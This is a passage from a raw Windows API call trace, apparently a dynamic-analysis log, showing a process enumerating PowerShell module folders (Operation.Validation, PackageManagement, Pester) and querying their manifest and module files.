ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a75a324, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.1", cAlternateFileName="103623~1.1")) returned 1 [0159.507] FindNextFileW (in: hFindFile=0x76d42d0, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.507] FindClose (in: hFindFile=0x76d42d0 | out: hFindFile=0x76d42d0) returned 1 [0159.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.507] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x90 [0159.507] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x90, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x8f [0159.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.508] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97de4ff6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x97de4ff6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x97de4ff6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0159.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.510] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x90 [0159.510] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x90, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x8f [0159.510] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x90 [0159.510] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", nBufferLength=0x90, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1", lpFilePart=0x0) returned 0x8f [0159.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.510] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\1.0.1\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\1.0.1\\microsoft.powershell.operation.validation.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5396204 | out: lpFileInformation=0x5396204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97de4ff6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x97de4ff6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x97de4ff6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x614)) returned 1 [0159.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.510] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psd1")) returned 0xffffffff [0159.510] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.psm1")) returned 0xffffffff [0159.510] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.cdxml")) returned 0xffffffff [0159.510] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.xaml")) returned 0xffffffff [0159.510] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.ni.dll")) returned 0xffffffff [0159.511] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.dll")) returned 0xffffffff [0159.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.511] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0159.511] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x43, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x42 [0159.511] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc717ae6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d43d0 [0159.511] FindNextFileW (in: hFindFile=0x76d43d0, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc717ae6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.511] FindNextFileW (in: hFindFile=0x76d43d0, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc718a55, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b27bb25, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0159.512] FindNextFileW (in: hFindFile=0x76d43d0, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.512] FindClose (in: hFindFile=0x76d43d0 | out: hFindFile=0x76d43d0) returned 1 [0159.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.512] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0159.512] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0159.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.512] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7a67f5, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5e5ed2e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5e5ed2e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8fa)) returned 1 [0159.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.514] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0159.514] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0159.514] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x62 [0159.514] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x62, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x61 [0159.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.515] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5398648 | out: lpFileInformation=0x5398648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7a67f5, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5e5ed2e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5e5ed2e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8fa)) returned 1 [0159.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.515] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0159.515] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0159.515] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0159.515] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0159.515] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0159.515] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0159.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.515] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0159.515] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x38, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x37 [0159.515] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4698376a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4698376a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d4290 [0159.516] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4698376a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4698376a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.516] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbc7fefb9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x34a924f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0159.516] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc8ab4af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a7cca5f, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.4.0", cAlternateFileName="34AE2D~1.0")) returned 1 [0159.516] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.516] FindClose (in: hFindFile=0x76d4290 | out: hFindFile=0x76d4290) returned 1 [0159.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.517] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.517] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0159.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.517] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9876e9c4, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9876e9c4, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9876e9c4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0159.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.518] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.518] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0159.518] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.518] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0159.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.519] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x539a2e0 | out: lpFileInformation=0x539a2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9876e9c4, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9876e9c4, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9876e9c4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0159.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.519] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.519] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0159.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.519] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x511551ea, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x511551ea, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x511551ea, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0159.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.521] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.521] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0159.521] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0159.521] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x4a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x49 [0159.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.521] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x539a520 | out: lpFileInformation=0x539a520*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x511551ea, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x511551ea, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x511551ea, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0159.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.522] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0159.522] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0159.522] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0159.522] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0159.522] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\Pester.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\pester.ni.dll")) 